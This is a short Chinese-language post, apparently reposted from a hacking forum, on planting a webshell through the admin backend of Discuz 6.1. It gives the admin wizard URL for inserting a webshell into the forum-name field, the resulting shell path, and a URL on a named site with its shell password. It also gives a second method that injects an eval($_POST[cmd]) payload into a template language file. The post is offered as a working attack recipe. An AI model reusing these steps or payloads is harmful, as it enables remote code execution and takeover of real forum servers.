天天看點

disucz 6.1背景拿webshell

<a href="http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt">http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txt</a>

admincp.php?action=runwizard&amp;frames=yes點選下一步然後再論壇名稱的地方插入webshell

背景webshell位址:bbs/forumdata/logs/runwizardlog.php

<a href="http://t00ls.yi.org/bbs/forumdata/logs/runwizardlog.php">http://t00ls.yi.org/bbs/forumdata/logs/runwizardlog.php</a>

密碼c

方法2:背景模闆管理--預設模闆套系--詳情

templates/default/actions.lang.php

jhackj//');eval($_POST[cmd])?&gt;;//

利用很簡單,聰明的人一看就懂了

繼續閱讀